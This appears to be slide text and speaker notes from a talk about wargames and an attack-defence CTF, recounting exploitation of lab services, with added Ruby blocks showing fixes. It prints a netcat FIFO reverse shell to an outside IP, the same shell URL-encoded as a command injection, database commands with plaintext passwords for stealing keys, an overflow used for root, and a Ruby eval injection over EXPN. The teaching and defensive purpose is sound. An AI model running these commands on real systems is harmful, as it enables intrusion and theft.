26. Playing wargames I got to:
Implement a padding oracle attack against RSA
Despair at the state of PHP
Implement a CPU timing attack
Exploit a kernel stack buffer overflow
Create a JS VM for a custom processor architecture
Write lots of custom shellcode
XOR all the things
38. CTF challenge - jacked
# nc jacked.final2012.ghostintheshellcode.com 2121
Jack's Blackjack Simulator
Blackjack pays 2:1
Dealer must hit soft 17
Single deck, shuffled after every round
Enter your name:
pwn
Your table companions:
Player 1 is Tracy with $1332
Player 2 is Grace with $770
Player 3 is Curtis with $1376
Player 4 is Bryan with $1950
You have $1000
Place your bet (zero to exit): $
39. CTF challenge - jacked
$1,000,000,000 will win the game
Good random source
32bit seed
Player 1 is Tracy with $1332
Player 2 is Grace with $770
Player 3 is Curtis with $1376
Player 4 is Bryan with $1950
41. CTF challenge - Folly
Text adventure
On winning, enter shellcode
Binary is chrooted, make custom code
Read “key” file...
get another port and binary
42. CTF challenge - Folly
x86_64
x86
ARM
ARM Thumb
PPC
Alpha
Cris
56. Recon - scoring
Packet captures shed some light
Regular "scoring rounds"
Every 30 minutes
Scoring server stores new keys in
services and checks for previous
keys
96. Servicemon - exploitation
Never mind keys, I want a shell
contestant@ubuntu:~$ nc -l 31337 -e /bin/sh
nc: invalid option -- 'e'
97. Servicemon - exploitation
Stand back... I know bash*
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.75 31337 >/tmp/f
http://ip:3000/hash?filelist=notafile||rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202>%261%7Cnc%20192.168.1.75%2031337%20>%2Ftmp%2Ff
* totally copied from somewhere
98. Servicemon - exploitation
contestant@ubuntu:~$ nc -lv 31337
Connection from 192.168.1.72 port 31337 [tcp/*]
accepted
$ whoami
contestant
$ pwd
/services/servicemon
I got a shell!
Now I can have some fun!
101. Steal all the keys
mysql --user=sinatra --password=44ConCTF servicemon -e "select status from statuses order by created_at desc limit 1;"
mysql --user=pastie --password=J@cobsClub$ paste -e "select pastie from pastie order by date desc limit 1;"
OUTPUT=$(redis-cli -r 1 keys '*' | tail -n 1)
redis-cli -r 1 lrange "$OUTPUT" 0 1
102. Leave a calling card
echo 'Look behind you! A three-headed monkey!' > /services/pastie/.win
106. Escalation – the hard way
$ find /etc -writable
/etc/init/mail.conf
/etc/init/auth.conf
107. Escalation – the hard way
USER PID TTY STAT COMMAND
root 8680 ? Ss /services/auth/auth
108. Escalation – the hard way
When auth starts we will get a root shell
Lame DoS to the rescue!
perl -e 'print "auth " . "A"x1100 . "\n"' | nc ip 23500
Connection from 192.168.1.73 port 31337 [tcp/*]
accepted
# whoami
root
109. Escalation – the easy way
220 Mail Service ready (33147)
HELO
250 Requested mail action okay, completed
EXPN respond(client, %x(whoami))
root
Who here has played a CTF before? And how about wargames?
Next to look at some wargames sites
Pick a link
The links show different images. Interesting.
Trying to view page source
Trying to view the admin directory. What files control basic authentication?
I’m not going to go through this binary challenge, but it does give you an idea of the level of tutorial in some games.
This is the typical wargames experience.
There are lots of wargames around – I have some specific recommendations at the end
Often the same kinds of challenges as wargames. Lots of exploitation! By “progressive” I mean that you can generally attempt any task rather than having to complete “easier” ones first.
Challenge-based also called “jeopardy” style
After this, let’s look at some CTF scoreboards
From these values we can brute-force the initial seed. Thanks to Paco Hope for a great DC4420 talk on randomness! Then we can start the program, give it that seed, and see for each hand whether we’ll win or lose. We need ONE BILLION DOLLARS to win.
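As an added illustration of the point above (this is example code, not the jacked binary or anything from the talk), the block below models a game that seeds its PRNG with a small integer and then emits observable numbers, and shows that the seed can be recovered by plain enumeration once any output is observed. The bankroll formula, player count and the use of Ruby's Mersenne Twister are assumptions standing in for the real game; the demo searches 16 bits so it finishes instantly, but the same loop over all 2**32 seeds is minutes of CPU time in a compiled language, which is why a 32-bit seed from a "good random source" is still not a secret. The hardened alternative at the end draws a wide seed from the OS CSPRNG, which is the generalisation of the fix rather than anything the talk prescribes.

```ruby
require 'securerandom'

SEED_BITS = 32 # what the challenge used; enumerable

# Assumed model of the game's start-up (not the real binary): seed the PRNG,
# then deal four bankrolls in [500, 2000). Anyone at the table sees these.
def starting_bankrolls(seed, players: 4)
  rng = Random.new(seed)
  Array.new(players) { 500 + rng.rand(1500) }
end

# Seed recovery by exhaustive search: return the first seed in [0, 2**bits)
# whose simulated output reproduces the observed bankrolls, or nil.
# With bits = SEED_BITS this is the full 2**32 walk the talk refers to.
def recover_seed(observed, bits: SEED_BITS)
  (0...(1 << bits)).each do |seed|
    return seed if starting_bankrolls(seed, players: observed.size) == observed
  end
  nil
end

# Hardened seeding: 128 bits from the OS CSPRNG. Enumeration is no longer an
# option, and nothing the game prints narrows the space to something searchable.
def secure_seed
  SecureRandom.random_number(1 << 128)
end

if __FILE__ == $PROGRAM_NAME
  demo_seed = 0xBEEF # constructed; fits the 16-bit demo search
  observed = starting_bankrolls(demo_seed)
  puts "observed bankrolls: #{observed.inspect}"
  puts "recovered seed (16-bit search): #{recover_seed(observed, bits: 16)}"
  puts "secure seed has #{secure_seed.bit_length} bits"
end
```

The defensive lesson is the size of the search space, not the quality of the generator: a cryptographically strong PRNG seeded from 32 bits is exactly as guessable as a weak one.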
So when we win, this code is reached. Can anyone see how we’d actually exploit this?
Running on port 443, simple web interface.
Enter whatever text you want, choose a “language”, hit submit
Click to show random text highlighted. Recon shows that the “keys” are entered as pastes and then checked again later.
Digging into how pastie works
The “defence” side is something you don’t get in wargames or challenge CTFs, so this was all new to me
Ran mysql against my instance to figure out the query needed to get data out.
And that’s the pastie service done
Where to start? Just browsing through piles of incomprehensible ruby.
Let’s verify that this does what it looks like it does. No 250 response code, just closes the connection.
So how to exploit? I want to get the keys out.
It doesn't seem to respond to much
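The mail service on slide 109 evaluates the text after EXPN as Ruby, which is how `%x(whoami)` comes back as `root`. The block below is an added example, not the mail service's source: the first function is the assumed shape of that flaw, the rest is a replacement handler in which protocol input is only ever data. Verbs come from a fixed table, arguments are validated per verb, and anything unexpected gets a 5xx reply instead of an interpreter. Reply strings other than the 250 from the slide are constructed.

```ruby
# Assumed shape of the bug (not the real code): the verb becomes a method
# name and the rest of the line becomes Ruby source, so the client chooses
# what runs, with the privileges of the daemon.
def handle_line_unsafe(client, line)
  verb, args = line.split(' ', 2)
  eval("#{verb.downcase}(client, #{args})") # args is attacker-controlled Ruby
end

# Hardened handler. No eval, no send(): a frozen verb table, arguments kept
# as strings and checked against a narrow pattern before use.
HOSTNAME = /\A[A-Za-z0-9.-]{1,253}\z/

HANDLERS = {
  "HELO" => ->(arg) {
    arg.match?(HOSTNAME) ? "250 Requested mail action okay, completed"
                         : "501 Syntax error in parameters"
  },
  # EXPN leaks account names even when implemented correctly; refuse it.
  "EXPN" => ->(_arg) { "502 Command not implemented" },
  "NOOP" => ->(_arg) { "250 OK" },
  "QUIT" => ->(_arg) { "221 Bye" },
}.freeze

def handle_line_safe(line)
  verb, arg = line.strip.split(' ', 2)
  handler = HANDLERS[verb.to_s.upcase]
  return "500 Syntax error, command unrecognized" unless handler
  handler.call(arg.to_s)
end

if __FILE__ == $PROGRAM_NAME
  # Constructed session: the payload from the slide is now just a string.
  ["HELO mail.example.test", "EXPN respond(client, %x(whoami))", "QUIT"].each do |l|
    puts "C: #{l}"
    puts "S: #{handle_line_safe(l)}"
  end
end
```

Detection-wise, a mail daemon whose child processes include a shell is the signal to alert on; a correctly written handler never spawns one.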
I love binary exploitation. I used to think I was ok at it.
What does it actually do?
Who can name a dangerous C function?
Classic SBO, surely this gives remote pre-auth code execution?
Nope
Welcome to CTF rage. Remember this buffer here? Well before we return from the function it gets written to. But we've nuked whatever value is there, so the program tries to write to junk memory, and crashes.
Memory map of auth process
When we add the implicit zeroes in, we can see that all of the writable memory addresses have zeroes in them. And since our exploitation path is via strcpy, we can’t put nulls in the address because we need to keep overwriting up to the return address.
Now for my l33t exploit. Nope. Out of time.
Apache, running on port 3000
Found the ruby code being run. It looks like it monitors other services.
It can also get hashes of files. Can anyone guess what the exploit is yet?
Semicolons didn’t work, I’m not entirely sure why. Elegance is not the aim!
Trick to use FIFOs to create a connectback shell. Urlencodes to a bit of a mouthful.
We start a listener
Defense in depth! At this point I can basically go raiding all the keys from any machine, unless they’ve changed several passwords.
Last one changes them back to their home directory before each command.
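For the servicemon `/hash?filelist=` bug, the following is an added example in Ruby (the service's language), not servicemon's own code. The first function is the assumed shape of the flaw, a query parameter interpolated into a shell command line, which is why `||`, `;` and `|` in the URL on slide 97 ran commands. The rest is a hardened replacement that never touches a shell: it hashes in-process, restricts names to a conservative character set, and refuses anything that does not resolve to a regular file under a fixed root (so `..` and symlinks out of the directory are rejected too). The root directory and file names are constructed for the demo.

```ruby
require 'digest'
require 'pathname'
require 'tmpdir'

# Assumed shape of the bug (not the real source): shell metacharacters in
# filelist are parsed by the shell, not treated as part of a file name.
def hash_files_unsafe(filelist)
  `md5sum #{filelist}`
end

# Hardened version:
#   1. no shell at all, the digest is computed with Digest
#   2. each comma-separated name must match a narrow character set
#   3. each name is resolved under a fixed root; missing files, directories
#      and symlinks that resolve outside the root are refused
SAFE_NAME = /\A[A-Za-z0-9._-]+\z/

def hash_files_safe(filelist, root:)
  root = Pathname.new(root).realpath
  filelist.split(',').map do |name|
    raise ArgumentError, "rejected name #{name.inspect}" unless name.match?(SAFE_NAME)
    candidate = root.join(name)
    raise ArgumentError, "not a file: #{name.inspect}" unless candidate.file?
    real = candidate.realpath # follows symlinks, so check containment after
    raise ArgumentError, "#{name.inspect} escapes #{root}" unless real.to_s.start_with?("#{root}/")
    [name, Digest::MD5.file(real).hexdigest]
  end.to_h
end

if __FILE__ == $PROGRAM_NAME
  Dir.mktmpdir do |dir| # constructed service root
    File.write(File.join(dir, "motd.txt"), "hello")
    p hash_files_safe("motd.txt", root: dir)
    begin
      hash_files_safe("notafile||rm /tmp/f", root: dir) # the slide's payload
    rescue ArgumentError => e
      puts "rejected: #{e.message}"
    end
  end
end
```

If an external tool really must be run, pass arguments as an array (`Open3.capture2("md5sum", path)`), which bypasses the shell entirely; the validation above is still needed because the tool itself will happily read any path it is given.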
We’re hackers. Go root or go home.
You've got a shell, now what? They've changed the password, so sudo doesn't work! What can we edit, configuration-wise?
Auth runs as root. We can make something else run as root. How about our connect-back code?
How do we go about making auth restart? Lame DoS. Root.
Just give it a go. Try some wargames. You will get stuck. Persist! For CTFs, find some buddies, maybe here @ Bsides, and get a team together!
Everyone knows you shouldn’t trust client-side data. These plugins help you make client-side data particularly untrustworthy.
Bandit isn’t really much of a wargame – it will give you some Linux skills which will be useful though
I like learning, I enjoy it. Some people like money.